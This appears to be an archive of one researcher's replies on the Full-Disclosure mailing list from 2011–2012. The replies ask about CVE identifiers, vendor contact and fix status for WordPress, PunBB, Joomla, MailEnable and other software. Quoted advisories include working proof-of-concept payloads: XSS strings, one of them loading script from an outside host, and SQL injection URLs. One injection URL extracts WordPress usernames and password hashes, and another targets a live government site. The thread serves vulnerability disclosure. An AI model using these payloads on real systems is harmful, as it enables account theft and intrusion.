use advanced search). If I remember correctly from muuratsalo's emails, he did 
get in contact with the vendor, but the vendor did not fix all issues and wasn't 
co-operative in discussion.

Do you think NS-12-007 and NS-12-008 are new issues? If so, we should request 
CVE identifiers if these differ a lot from the other XSS issues. At the point where 
the vendor neither fixes issues like these nor replies, I would say that people 
shouldn't be using the software at all.

- Henri Salo



Re: [Full-disclosure] Pligg 0.9/1.x remote code execution

2012-07-28 Thread Henri Salo
On Sat, Jul 21, 2012 at 06:34:46PM +0200, BlackHawk wrote:
> Exploit attached, info inside. 2.0 versions could still be affected
> 
> http://pastebin.com/MSXFSvzA

Do you know if these issues have been fixed in some version of Pligg and if 
they have CVE identifiers? I tried to ask this on forum.pligg.com, but my 
post was removed.

- Henri Salo



Re: [Full-disclosure] PenTest is one year old now

2012-04-20 Thread Henri Salo
On Fri, Apr 20, 2012 at 12:54:11PM +0200, Krzysztof Marczyk wrote:
> Hello Everyone,
> 
> I have pleasure to announce that PenTest Magazine is one year old now. This
> is special time, so we decided to celebrate it. We prepared for you a
> unique 40% discount on annual subscription to PenTest Magazine. Please
> follow this link:
> http://pentestmag.com/subscribe/subscription-for-individual-subscribers/subscription-for-individual-subscribers-promo/
> and
> use this password: 40less1PROMO. Don't wait, the offer lasts only until the
> end of April 22nd!

Please stop spamming...



Re: [Full-disclosure] Pandora FMS v4.0.1 - Local File Include Vulnerability

2012-02-27 Thread Henri Salo
On Fri, Feb 17, 2012 at 01:32:19AM +0100, resea...@vulnerability-lab.com wrote:
> Title:
> Pandora FMS v4.0.1 - Local File Include Vulnerability
> 
> Date:
> 2012-02-17
> 
> References:
> http://www.vulnerability-lab.com/get_content.php?id=435
> 
> VL-ID:
> 435
> 
> Report-Timeline:
> 2012-02-01: Vendor Notification
> 2012-02-17: Public or Non-Public Disclosure

How did the vendor respond? Has this been fixed by the vendor?

- Henri Salo



Re: [Full-disclosure] Advisory: sudo 1.8 Format String Vulnerability

2012-01-30 Thread Henri Salo
On Mon, Jan 30, 2012 at 02:56:26PM +0100, joernchen of Phenoelit wrote:
> Hi,
> 
> FYI, see attached.
> 
> cheers,
> 
> joernchen
> -- 
> joernchen ~ Phenoelit
>  ~ C776 3F67 7B95 03BF 5344
> http://www.phenoelit.de  ~ A46A 7199 8B7B 756A F5AC

This seems to be CVE-2012-0809 and reported to Gentoo as 
https://bugs.gentoo.org/show_bug.cgi?id=401533

- Henri Salo



Re: [Full-disclosure] Advisory: sudo 1.8 Format String Vulnerability

2012-01-30 Thread Henri Salo
On Mon, Jan 30, 2012 at 02:56:26PM +0100, joernchen of Phenoelit wrote:
> Hi,
> 
> FYI, see attached.
> 
> cheers,
> 
> joernchen

Reported to Debian: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=657985

- Henri Salo



Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress

2012-01-26 Thread Henri Salo
On Wed, Jan 25, 2012 at 04:13:12PM +, Benji wrote:
> Yes it does.
> 
> wp-admin/setup-config.php?step=1 on any wp install where it exists gives
> this:
> 
> The file 'wp-config.php' already exists one level above your WordPress
> installation. If you need to reset any of the configuration items in this
> file, please delete it first.

Yes, this is correct information, at least with new versions of WordPress. We are 
running a pretty big Linux server in our organization and I can tell you that 
open "install me" pages are very common and I see these as a problem.

I can try to find out what went wrong with the installation, or whether they removed 
the WordPress installation and didn't realise they had to remove everything included. 
I really hope to see this patched anyway, just to be sure. I don't know what 
the actual impact on user experience would be. Could WordPress comment?

- Henri Salo



Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress

2012-01-25 Thread Henri Salo
On Wed, Jan 25, 2012 at 08:43:34AM -0600, Trustwave Advisories wrote:
> The vendor was notified. They have chosen not to fix the issue at this time. 
> The Vendor Response section has the details:
> 
> Vendor Response:
> Due to the fact that the component in question is an installation script,
> the vendor has stated that the attack surface is too small to warrant
> a fix:
> 
> "We give priority to a better user experience at the install process. It is
> unlikely a user would go to the trouble of installing a copy of WordPress
> and then not finishing the setup process more-or-less immediately. The
> window of opportunity for exploiting such a vulnerability is very small."
> 
> However, Trustwave SpiderLabs urges caution in situations where the
> WordPress installation script is provided as part of a default image.
> This is  often done as a convenience on hosting providers, even in
> cases where the client does not use the software. It is a best practice
> to ensure  that no installation scripts are exposed to outsiders, and
> these vulnerabilities reinforce the importance of this step.

There are A LOT of these open installation pages on the Internet. It is not 
uncommon to leave those open by accident. Some people also do this because 
they just don't understand the risks. I am wondering if WordPress would apply 
a patch if we create one as a collaborative effort. I would be more than happy to 
help create a patch for this if that is the case.

- Henri Salo



Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress

2012-01-24 Thread Henri Salo
> exposed installation scripts.
> 
> 
> Vendor Communication Timeline:
> 12/22/11 - Vulnerability disclosed
> 01/16/12 - Confirmation to release vulnerabilities
> 01/24/12 - Advisory published
> 
> 
> References
> 1. http://www.wordpress.org
> 
> 
> About Trustwave:
> Trustwave is the leading provider of on-demand and subscription-based
> information security and payment card industry compliance management
> solutions to businesses and government entities throughout the world. For
> organizations faced with today's challenging data security and compliance
> environment, Trustwave provides a unique approach with comprehensive
> solutions that include its flagship TrustKeeper compliance management
> software and other proprietary security solutions. Trustwave has helped
> thousands of organizations--ranging from Fortune 500 businesses and large
> financial institutions to small and medium-sized retailers--manage
> compliance and secure their network infrastructure, data communications and
> critical information assets. Trustwave is headquartered in Chicago with
> offices throughout North America, South America, Europe, Africa, China and
> Australia. For more information, visit https://www.trustwave.com
> 
> About Trustwave's SpiderLabs:
> SpiderLabs(R) is the advanced security team at Trustwave focused on
> application security, incident response, penetration testing, physical
> security and security research. The team has performed over a thousand
> incident investigations, thousands of penetration tests and hundreds of
> application security tests globally. In addition, the SpiderLabs Research
> team provides intelligence through bleeding-edge research and proof of
> concept tool development to enhance Trustwave's products and services.
> https://www.trustwave.com/spiderlabs
> 
> Disclaimer:
> The information provided in this advisory is provided "as is" without
> warranty of any kind. Trustwave disclaims all warranties, either express or
> implied, including the warranties of merchantability and fitness for a
> particular purpose. In no event shall Trustwave or its suppliers be liable
> for any damages whatsoever including direct, indirect, incidental,
> consequential, loss of business profits or special damages, even if
> Trustwave or its suppliers have been advised of the possibility of such
> damages. Some states do not allow the exclusion or limitation of liability
> for consequential or incidental damages so the foregoing limitation may not
> apply.
> 
> This transmission may contain information that is privileged, confidential, 
> and/or exempt from disclosure under applicable law. If you are not the 
> intended recipient, you are hereby notified that any disclosure, copying, 
> distribution, or use of the information contained herein (including any 
> reliance thereon) is STRICTLY PROHIBITED. If you received this transmission 
> in error, please immediately contact the sender and destroy the material in 
> its entirety, whether in electronic or hard copy format.

These haven't been fixed, and some of these issues have been known for a while if 
you talk to users of WordPress or administrators of servers using the software. 
I am not saying that these are not real issues or anything like that. Have you 
contacted WordPress? Did they reply that they will fix these issues?

- Henri Salo



Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine

2012-01-24 Thread Henri Salo
On Wed, Jan 25, 2012 at 12:47:28AM +0100, Ben Bucksch wrote:
> On 25.01.2012 00:09, Dan Kaminsky wrote:
> > IP KVM, in which the foreign server basically gets only inbound 
> > Keyboard and Mouse and outbound uncompressed pixels.
> 
> That is *precisely* what VNC is: an open-source IP KVM.

What the hell? Seriously..

http://en.wikipedia.org/wiki/VNC

- Henri



[Full-disclosure] ME020567: MailEnable webmail cross-site scripting vulnerability CVE-2012-0389

2012-01-12 Thread Henri Salo
ME020567: MailEnable webmail cross-site scripting vulnerability (CWE-79)
References: CVE-2012-0389
Discovered by: Sajjad Pourali, Narendra Shinde and Shahab NamaziKhah
Vendor advisory: http://www.mailenable.com/kb/Content/Article.asp?ID=me020567
Vendor contact: 2012-01-04 09:49:36 UTC
Vendor response: 2012-01-04 10:27:13 UTC (Peter Fregon from MailEnable)
Vendor fix and announcement: 2012-01-10 00:50:31 UTC

Vulnerability description:

MailEnable <http://www.mailenable.com/> Professional and Enterprise versions 
are prone to cross-site scripting vulnerabilities as the user-supplied input 
received via the "Username" parameter of the "ForgottenPassword.aspx" page is not 
properly sanitized. A specially crafted URL which a user clicks could gain 
access to the user's cookies for webmail or execute other malicious code in the 
user's browser in the context of the domain in use.

Remote: yes
Authentication required: no
User interaction required: yes

Affected:

- MailEnable Professional, Enterprise & Premium 4.26 and earlier
- MailEnable Professional, Enterprise & Premium 5.52 and earlier
- MailEnable Professional, Enterprise & Premium 6.02 and earlier

Not affected:

- MailEnable Standard is not affected.

PoC:

http://example.com/mewebmail/Mondo/lang/sys/ForgottenPassword.aspx?Username='};alert(/XSS/);{'

Resolution:

Users of MailEnable 5 and 6 can resolve the issue by upgrading to version 5.53 
or 6.03 or later. Alternatively, and for version 4 users, the following fix can 
be applied:

1) Open the ForgottenPassword.aspx file in Notepad. This file is in the Mail 
Enable\bin\NETWebMail\Mondo\lang\[language] folders in version 4 and in Mail 
Enable\bin\NETWebMail\Mondo\lang\sys in version 5 and 6.
2) Locate and remove the following line, then save the file: 
document.getElementById("txtUsername").value = '<%= Request.Item("Username") %>';

- Henri Salo



Re: [Full-disclosure] Vulnerabilities in Zeema CMS

2011-12-04 Thread Henri Salo
On Sun, Dec 04, 2011 at 03:00:42AM +0200, MustLive wrote:
> Hello list!
> 
> I want to warn you about Brute Force, Cross-Site Scripting and Full path
> disclosure vulnerabilities in Zeema CMS. It's a Ukrainian commercial CMS.
> 
> -
> Affected products:
> -
> 
> Vulnerable are all versions of Zeema CMS.
> 
> --
> Details:
> --
> 
> Brute Force (WASC-11):
> 
> http://site/cms/
> 
> XSS (WASC-08):
> 
> http://site/search/?query=%22%20style=%22-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml%23xss)
> 
> Attack will work in Mozilla and Firefox.
> 
> Full path disclosure (WASC-13):
> 
> http://site/search/?page=10&query=site
> 
> 
> Timeline:
> 
> 
> 2011.09.12 - found vulnerabilities during audit. After that client straight
> away informed developers.
> 2011.10.22 - announced at my site.
> 2011.10.23 - informed developers.
> 2011.12.02 - disclosed at my site.
> 
> I mentioned about these vulnerabilities at my site
> (http://websecurity.com.ua/5459/).
> 
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua

Again some never-heard-of software. Where does one find this on the internet? Is 
there an item in an issue or bug tracker for this?

- Henri Salo



Re: [Full-disclosure] Wordpress plugin BackWPup Remote and Local Code Execution Vulnerability - SOS-11-003

2011-11-30 Thread Henri Salo
On Mon, Mar 28, 2011 at 03:10:39PM +1100, Lists wrote:
> Sense of Security - Security Advisory - SOS-11-003
> 
> Release Date.  28-Mar-2011
> Last Update.   -
> Vendor Notification Date.  25-Mar-2010
> Product.   Wordpress Plugin BackWPup
> Platform.  Independent
> Affected versions. 1.6.1 (verified), possibly others
> Severity Rating.   High
> Impact.System Access
> Attack Vector. Remote without authentication
> Solution Status.   Upgrade to version 1.7.1
> CVE reference. Not yet assigned
> 
> Details.
> A vulnerability has been discovered in the Wordpress plugin BackWPup 
> 1.6.1 which can be exploited to execute local or remote code on the web 
> server. The Input passed to the component "wp_xml_export.php" via the 
> "wpabs" variable allows the inclusion and execution of local or remote 
> PHP files as long as a "_nonce" value is known. The "_nonce" value 
> relies on a static constant which is not defined in the script meaning 
> that it defaults to the value "822728c8d9".
> 
> Proof of Concept.
> 
> Solution.
> Upgrade to version 1.7.1
> 
> Discovered by.
> Phil Taylor - Sense of Security Labs.
> 
> Sense of Security Pty Ltd
> Level 8, 66 King St
> Sydney NSW 2000
> AUSTRALIA
> T: +61 (0)2 9290 
> F: +61 (0)2 9290 4455
> W: http://www.senseofsecurity.com.au
> E: i...@senseofsecurity.com.au
> Twitter: @ITsecurityAU
> 
> The latest version of this advisory can be found at:
> http://www.senseofsecurity.com.au/advisories/SOS-11-003.pdf
> 
> Other Sense of Security advisories can be found at:
> http://www.senseofsecurity.com.au/research/it-security-advisories.php

http://osvdb.org/show/osvdb/71481
CVE-2011-4342

- Henri Salo



Re: [Full-disclosure] LabWiki <= 1.1 Multiple Vulnerabilitie

2011-11-21 Thread Henri Salo
On Wed, Nov 09, 2011 at 10:42:01AM +0100, muuratsalo experimental hack lab wrote:
> 
> LabWiki <= 1.1 Multiple Vulnerabilities
> 
> 
> author: muuratsalo (Revshell.com)
> contact...: muuratsalo[at]gmail[dot]com
> download..: http://www.bioinformatics.org/phplabware/labwiki/index.php
> 
> 
> [0x01] Vulnerability overview:
> 
> All versions of LabStore <= 1.1 are affected by multiple vulnerabilities.
> 
> 
> [0x02] Disclosure timeline:
> 
> [08/11/2011] - Multiple vulnerabilities discovered and reported to the vendor.
> [08/11/2011] - The vendor confirmed the vulnerabilities and he is
> working on fixing the reported issues.
> [09/11/2011] - Public Disclosure
> 
> 
> [0x03] Vulnerabilities:
> 
> -- Shell Upload Vulnerability --
> The upload script /edit.php improperly checks the filetype of uploaded images.
> A 'shell.php.gif' is accepted.  /* -- note that access to edit.php
> could be restricted-- */
> 
> -- Multiple Cross Site Scripting Vulnerabilities --
> http://localhost/LabWiki/index.php?from=";>alert('muuratsalo')&help=true&page=What_is_wiki
> http://localhost/LabWiki/recentchanges.php?nothing=nothing&page_no=";>alert('muuratsalo')

CVE-identifiers assigned: http://seclists.org/oss-sec/2011/q4/370

Best regards,
Henri Salo



Re: [Full-disclosure] Joomla Component (com_content) - Blind SQL Injection Vulnerability

2011-11-13 Thread Henri Salo
On Sat, Nov 12, 2011 at 12:35:35AM +0100, resea...@vulnerability-lab.com wrote:
> Title:
> ==
> Joomla Component (com_content) -  Blind SQL Injection Vulnerability
> 
> 
> Date:
> =
> 2011-11-11
> 
> 
> References:
> ===
> http://www.vulnerability-lab.com/get_content.php?id=323
> 
> 
> VL-ID:
> =
> 323
> 
> 
> Introduction:
> =
> Joomla is a free and open source content management system (CMS) for 
> publishing content on
> the World Wide Web and intranets and a model–view–controller (MVC) Web 
> application framework
> that can also be used independently.
> Joomla is written in PHP, uses object-oriented programming (OOP) techniques 
> and software design
> patterns[citation needed], stores data in a MySQL database, and includes 
> features such as page
> caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, 
> search, and support
> for language internationalization.
> Joomla had been downloaded 23 million times. Between March 2007 and February 
> 2011 there had been
> more than 21 million downloads. There are over 7,400 free and commercial 
> extensions available
> from the official Joomla! Extension Directory and more available from other 
> sources
> 
> (Copy of the Vendor Website: http://en.wikipedia.org/wiki/Joomla!)
> 
> 
> Abstract:
> =
> A vulnerability laboratory researcher discovered a Blind SQL Injection 
> vulnerability on the com_content component of the joomla CMS.
> 
> 
> Status:
> 
> Published
> 
> 
> Exploitation-Technique:
> ===
> Remote
> 
> 
> Severity:
> =
> Critical
> 
> 
> Details:
> 
> A blind SQL Injection vulnerability was detected on the com_content component 
> of the joomla CMS.
> The vulnerability allows an attacker (remote) to inject/execute own sql 
> statements on the affected application dbms.
> Successful exploitation of the vulnerability can result in compromise of the 
> affected application dbms.
> 
> Vulnerable Module(s):
> [+] com_content
> 
> 
> Proof of Concept:
> =
> The vulnerability can be exploited by remote attackers. For demonstration or 
> reproduce ...
> 
> 1: [Site]/joomla/index.php?option=com_content&view=archive&year=1 [BSQLI] 
>   
>   
> 2: [Site]/joomla/index.php?option=com_content&view=archive&year=-1 or 1=1--   
>   
>   
> 3: [Site]/joomla/index.php?option=com_content&view=archive&year=-1 or 1=0--   
> 
> 
> [x] Demo :
> 
> http://www.paul.house.gov/index.php?option=com_content&view=archive&year=-1 
> or 1=0--
> 
> 
> Risk:
> =
> The security risk of the blind sql injection vulnerability is estimated as 
> critical.
> 
> 
> Credits:
> 
> E.Shahmohamadi  (IRAN)
> 
> 
> Disclaimer:
> ===
> The information provided in this advisory is provided as it is without any 
> warranty. Vulnerability-Lab disclaims all warranties, 
> either expressed or implied, including the warranties of merchantability and 
> capability for a particular purpose. Vulnerability-
> Lab or its suppliers are not liable in any case of damage, including direct, 
> indirect, incidental, consequential loss of business 
> profits or special damages, even if Vulnerability-Lab or its suppliers have 
> been advised of the possibility of such damages. Some 
> states do not allow the exclusion or limitation of liability for 
> consequential or incidental damages so the foregoing limitation 
> may not apply. Any modified copy or reproduction, including partially usages, 
> of this file requires authorization from Vulnerability-
> Lab. Permission to electronically redistribute this alert in its unmodified 
> form is granted. All other rights, including the use of 
> other media, are reserved by Vulnerability-Lab or its suppliers.
> 
>   Copyright © 
> 2011|Vulnerability-Lab
> 
> -- 
> Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
> Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com

Did you report this to Joomla? Have you asked CVE ID?

Best regards,
Henri Salo


[Full-disclosure] Steam defaced

2011-11-10 Thread Henri Salo
As I usually have good news.. Here is some more: 
http://forums.steampowered.com/forums/

Steam joins the failboat.

Regards,
Henri Salo



Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)

2011-11-09 Thread Henri Salo
On Wed, Nov 09, 2011 at 06:45:59AM -0500, Dan Rosenberg wrote:
> People seem incredulous that the bug can be triggered by sending
> traffic to closed ports.  Keep in mind that the only way your
> networking stack knows to reject packets that are directed towards
> closed ports is to do some preliminary parsing of those packets,
> namely allocating some control structures, receiving at least the
> physical/link layer frame, IP header, and transport layer header, and
> parsing out the port and destination address.  There's plenty of
> things that can go wrong before the kernel decides "this is for a port
> that's not open" and drops it, which appears to be what happened here.
>  Doesn't make the bug any less terrible, but it's not quite as
> surprising as people seem to think.

I am surprised about this, because Microsoft is definitely lacking some level 
of testing and change management in critical code. How many servers are people 
using without networking these days? We are talking about a remote execution 
vulnerability in something which obviously might go unnoticed when we think of 
security audits, PCI and such. I wonder if the integrated firewall in Windows could 
block this, as Microsoft should do everything in their power to stop attacks on 
this security vulnerability.

Related picture: http://paste.nerv.fi/72975464-itbegins.jpeg

Best regards,
Henri Salo



[Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)

2011-11-08 Thread Henri Salo
http://technet.microsoft.com/en-us/security/bulletin/ms11-083

"The vulnerability could allow remote code execution if an attacker sends a 
continuous flow of specially crafted UDP packets to a closed port on a target 
system."

Microsoft did it once again.

- Henri Salo



Re: [Full-disclosure] Strange Lenovo x121e

2011-10-05 Thread Henri Salo
On Wed, Oct 05, 2011 at 07:57:03PM +, halfdog wrote:
> 
> Hello List,
> 
> I just purchased a Lenovo x121e and just before init with random data
> and setting up the crypto disks, I found that the disk was not
> completely clean. It seems that
> 
> a) X121 ships with a dirty disk or
> b) machine was used before purchase
> 
> After reconstruction of bootsector, a NTFS partition is readable,
> pagefile.sys shows
>   COMPUTERNAME=ADMIN-THINK
> 
> Newest files in /
> dr-x--  1 root root  28672 May 29 09:45 SWDL
> -r  2 root root   2490 May 29 09:36 ExitWinXP.bat
> dr-x--  1 root root   4096 Apr  6 13:59 WWAN1
> dr-x--  1 root root  0 Mar  1  2011 Temp
> dr-x--  1 root root  0 Jan  6  2011 $Recycle.Bin
> dr-x--  1 root root   4096 Jan  6  2011 Users
> dr-x--  1 root root  0 Jan  6  2011 Intel
> -r  2 root root   1959 Oct  2  2010 bluetooth.txt
> 
> Funny: Might also be infected with virus, that generated sal.xls.exe
> 
> -r  2 root root   4810 Oct 13  2007
> \346\270\205\351\231\244sal.xls.exe\347\227\205\346\257\222.bat
> 
> The non-printables seem to be UTF-8 and display as Chinese glyphs on
> other machine.
> 
> I'm a complete noob in win-forensics, but at least it seems, that there
> is no evidence for other user accounts, Documents & Settings empty, so
> perhaps this could really be an authentic IBM OEM image (with virus),
> but they just replaced the boot sector to get rid of the partitions?
> 
> Since I don't want to waste too much time on dirty hardware, I did
> some googling, but found nothing of value.
> 
> 
> Does someone know of similar findings on Lenovo machines and what's
> your guess: is it worth to dig in deeper or is it just waste of time
> to recover OEM-Windows image, that was deflowered and insufficiently
> cleaned by some Chinese factory worker during lunch hours?
> 
> hd
> 
> -- 
> http://www.halfdog.net/
> PGP: 156A AE98 B91F 0114 FE88  2BD8 C459 9386 feed a bee
> 

I have a pretty new X220t and on 2011-09-18 I noticed this 
http://paste.nerv.fi/59031966-strangedrivers.png when I was working as 
administrator. I didn't have any network connected (LAN, WLAN, bluetooth) nor 
USB devices. I also checked the event viewer, but didn't find anything useful. I 
didn't notice it again, nor did I find any evidence of abuse. There is a recovery 
partition in my model at least, which could hold a big amount of executables 
and/or drivers. I also do know how to use Windows, so as far as I can tell my 
laptop is pretty secure. I have a firewall, IPS and anti-virus, and I am not 
installing programs on my system easily :)

Please notify me if you find anything related to this issue. I would be happy 
to receive a sample of sal.xls.exe. Where did you purchase your laptop?

Best regards,
Henri Salo



Re: [Full-disclosure] PunBB PHP Forum - Multiple XSS

2011-09-22 Thread Henri Salo
On Fri, Sep 16, 2011 at 06:43:47PM +0200, Piotr Duszynski wrote:
> ===
> PunBB PHP Forum - Multiple XSS
> ===
> 
> Affected Software : PunBB PHP Forum
> Severity  : Medium
> Local/Remote  : Remote
> Author: @drk1wi
> 
> [Summary]
> 
> Just for those whom it might concern.
> These vulnerabilities have been identified for the latest (clean 
> version 1.3.5) during one of my penetration tests.
> 
> [Vulnerability Details]
> 
> 
> GET 
> /login.php?action=out&id=3&csrf_token=4b072f27396cec5d79"/>alert(oink)
> GET 
> /misc.php?action=markforumread&fid=1&csrf_token=c173cabad786"/>alert(oink)
> 
> POST /delete.php?id=>"'>alert(oink)
> form_sent=>"'>alert(oink)&csrf_token=>"'>alert(oink)&req_confirm=>"'>alert(oink)&delete=>"'>alert(oink)
> 
> POST /edit.php?id=>"'>alert(oink)
> form_sent=>"'>alert(oink)&csrf_token=>"'>alert(oink)&req_message=>"'>alert(oink)&submit=>"'>alert(oink)
> 
> POST /login.php?action=>"'>alert(oink)
> form_sent=>"'>alert(oink)&csrf_token=>"'>alert(oink)&req_email=>"'>alert(oink)&request_pass=>"'>alert(oink)
> 
> POST /misc.php?email=>"'>alert(oink)
> form_sent=>"'>alert(oink)&redirect_url=>"'>alert(oink)&csrf_token=>"'>alert(oink)&req_subject=>"'>alert(oink)&req_message=>"'>alert(oink)&submit=>"'>alert(oink)
> 
> POST /profile.php?action=>"'>alert(oink)&id=>"'>alert(oink)
> form_sent=>"'>alert(oink)&csrf_token=>"'>alert(oink)&req_old_password=>"'>alert(oink)&req_new_password1=>"'>alert(oink)&req_new_password2=>"'>alert(oink)&update=>"'>alert(oink)
> 
> POST /register.php?action=>"'>alert(oink)
> form_sent=>"'>alert(oink)&csrf_token=>"'>alert(oink)&req_username=>"'>alert(oink)&req_password1=>"'>alert(oink)&req_password2=>"'>alert(369448)&req_email1=>"'>alert(oink)&timezone=>"'>alert(oink)&register=>"'>alert(oink)
> 
> 
> [Time-line]
> 
> 20/08/2011 - Vendor notified
> 02/09/2011 - No e-mail reply and BAN on Forum
> ???- Vendor patch release
> 16/09/2011 - Public disclosure
> 
> [Fix Information]
> 
> 
> Cheers,
> Piotr Duszynski (@drk1wi)
> http://sharpsec.net
> 
> X. LEGAL NOTICES
> 
> Copyright (c) 2011 Piotr "drk1wi" Duszynski
> 
> Permission is granted for the redistribution of this alert
> electronically. It may not be edited in any way without my express
> written consent. If you wish to reprint the whole or any
> part of this alert in any other medium other than electronically,
> please email me for permission.
> 
> Disclaimer: The information in the advisory is believed to be accurate
> at the time of publishing based on currently available information. Use
> of the information constitutes acceptance for use in an AS IS 
> condition.
> There are no warranties with regard to this information. Neither the
> author nor the publisher accepts any liability for any direct, 
> indirect,
> or consequential loss or damage arising from use of, or reliance on,
> this information.

CVE-2011-3371

Best regards,
Henri Salo



Re: [Full-disclosure] PunBB PHP Forum - Multiple XSS

2011-09-18 Thread Henri Salo
On Fri, Sep 16, 2011 at 06:43:47PM +0200, Piotr Duszynski wrote:

Fixed on: 
https://github.com/punbb/punbb/commit/dd50a50a2760f10bd2d09814e30af4b36052ca6d
PunBB 1.3.6 released: https://github.com/downloads/punbb/punbb/punbb-1.3.6.zip

I can request a CVE identifier for this issue.

Best regards,
Henri Salo



Re: [Full-disclosure] PunBB PHP Forum - Multiple XSS

2011-09-17 Thread Henri Salo
On Fri, Sep 16, 2011 at 06:43:47PM +0200, Piotr Duszynski wrote:

http://punbb.informer.com/forums/topic/24427/multiple-xss-vulnerabilities/

Best regards,
Henri Salo



Re: [Full-disclosure] PunBB PHP Forum - Multiple XSS

2011-09-17 Thread Henri Salo
On Fri, Sep 16, 2011 at 06:43:47PM +0200, Piotr Duszynski wrote:

I also reported these vulnerabilities to the PunBB PHP Forum developers using 
http://punbb.informer.com/bugreport.php. Let's see what they answer. Have they 
replied to you yet?

Best regards,
Henri Salo



Re: [Full-disclosure] WordPress Auctions plugin <= 1.8.8 SQL Injection Vulnerability

2011-09-15 Thread Henri Salo
On Wed, Sep 14, 2011 at 04:06:26PM -0300, Heyder[AlligatorTeam] wrote:
> # Exploit Title: WordPress Auctions plugin <= 1.8.8 SQL Injection Vulnerability
> # Date: 2011-09-09
> # Author: sherl0ck_ @AlligatorTeam
> # Software Link: http://downloads.wordpress.org/plugin/wp-auctions.zip
> # Version: 1.8.8 (tested)
> 
> ---
> PoC
> ---
> 
> URL:
> http://localhost/wordpress/wp-admin/admin.php?page=wp-auctions-add&wpa_action=edit&wpa_id=-1+union+all+select+1,2,3,USER(),concat(user_login,char(58),user_pass),DATABASE(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+wp_users&_wpnonce=e04f105b8e
> 
> ---
> Vulnerable code
> ---
> ...
> elseif($_GET["wpa_action"] == "edit"):
> $strSQL = "SELECT * FROM ".$table_name." WHERE id=".$_GET["wpa_id"];
> ...
> elseif($_GET["wpa_action"] == "relist"):
> $strSQL = "SELECT * FROM ".$table_name." WHERE id=".$_GET["wpa_id"];
> ...
> $resultList = $wpdb->get_row($strSQL);
> ...

Module owner replied:

"Thanks for raising this with us. The report is right in pointing out that 
those parameters aren't sanitised (which we will address immediately). It's 
worth pointing out though, that this is an administration module (protected by 
WordPress's user permissions), rather than one that can be accessed anonymously."

Follow-up: 
http://wordpress.org/support/topic/plugin-wp-auctions-wordpress-auctions-plugin?replies=3#post-2341622

Best regards,
Henri Salo



Re: [Full-disclosure] WordPress Auctions plugin <= 1.8.8 SQL Injection

2011-09-15 Thread Henri Salo
On Wed, Sep 14, 2011 at 08:12:33PM +0300, Henri Salo wrote:
> On Wed, Sep 14, 2011 at 12:04:03PM -0300, Heyder[AlligatorTeam] wrote:
> 
> Did you report this issue to the author of the plugin?
> 
> Best regards,
> Henri Salo

Module owner replied:

"Thanks for raising this with us. The report is right in pointing out that 
those parameters aren't sanitised (which we will address immediately). It's 
worth pointing out though, that this is an administration module (protected by 
WordPress's user permissions), rather than one that can be accessed anonymously."

Follow-up: 
http://wordpress.org/support/topic/plugin-wp-auctions-wordpress-auctions-plugin?replies=3#post-2341622

Best regards,
Henri Salo



Re: [Full-disclosure] WordPress Auctions plugin <= 1.8.8 SQL Injection

2011-09-14 Thread Henri Salo
On Wed, Sep 14, 2011 at 12:04:03PM -0300, Heyder[AlligatorTeam] wrote:

Did you report this issue to the author of the plugin?

Best regards,
Henri Salo



Re: [Full-disclosure] [SECURITY] CVE-2011-3190 Apache Tomcat Authentication bypass and information disclosure

2011-09-07 Thread Henri Salo
On Wed, Aug 31, 2011 at 01:22:51PM +0300, Henri Salo wrote:
> On Mon, Aug 29, 2011 at 08:52:00PM +0100, Mark Thomas wrote:
> > CVE-2011-3190 Apache Tomcat Authentication bypass and information disclosure
> > 
> > Severity: Important
> > 
> > Vendor: The Apache Software Foundation
> > 
> > Versions Affected:
> > - Tomcat 7.0.0 to 7.0.20
> > - Tomcat 6.0.0 to 6.0.33
> > - Tomcat 5.5.0 to 5.5.33
> > - Earlier, unsupported versions may also be affected
> > 
> > Description:
> > Apache Tomcat supports the AJP protocol which is used with reverse
> > proxies to pass requests and associated data about the request from the
> > reverse proxy to Tomcat. The AJP protocol is designed so that when a
> > request includes a request body, an unsolicited AJP message is sent to
> > Tomcat that includes the first part (or possibly all) of the request
> > body. In certain circumstances, Tomcat did not process this message as a
> > request body but as a new request. This permitted an attacker to have
> > full control over the AJP message which allowed an attacker to (amongst
> > other things):
> > - insert the name of an authenticated user
> > - insert any client IP address (potentially bypassing any client IP
> > address filtering)
> > - trigger the mixing of responses between users
> > 
> > The following AJP connector implementations are not affected:
> > org.apache.jk.server.JkCoyoteHandler (5.5.x - default, 6.0.x - default)
> > 
> > The following AJP connector implementations are affected:
> > 
> > org.apache.coyote.ajp.AjpProtocol (6.0.x, 7.0.x - default)
> > org.apache.coyote.ajp.AjpNioProtocol (7.0.x)
> > org.apache.coyote.ajp.AjpAprProtocol (5.5.x, 6.0.x, 7.0.x)
> > 
> > Further, this issue only applies if all of the following are true
> > for at least one resource:
> > - POST requests are accepted
> > - The request body is not processed
> > 
> > 
> > Example: See https://issues.apache.org/bugzilla/show_bug.cgi?id=51698
> > 
> > Mitigation:
> > Users of affected versions should apply one of the following mitigations:
> > - Upgrade to a version of Apache Tomcat that includes a fix for this
> > issue when available
> > - Apply the appropriate patch
> >   - 7.0.x http://svn.apache.org/viewvc?rev=1162958&view=rev
> >   - 6.0.x http://svn.apache.org/viewvc?rev=1162959&view=rev
> >   - 5.5.x http://svn.apache.org/viewvc?rev=1162960&view=rev
> > - Configure the reverse proxy and Tomcat's AJP connector(s) to use the
> > requiredSecret attribute
> > - Use the org.apache.jk.server.JkCoyoteHandler AJP connector (not
> > available for Tomcat 7.0.x)
> > 
> > Credit:
> > The issue was reported via Apache Tomcat's public issue tracker.
> > The Apache Tomcat security team strongly discourages reporting of
> > undisclosed vulnerabilities via public channels. All Apache Tomcat
> > security vulnerabilities should be reported to the private security team
> > mailing list: secur...@tomcat.apache.org
> > 
> > References:
> > http://tomcat.apache.org/security.html
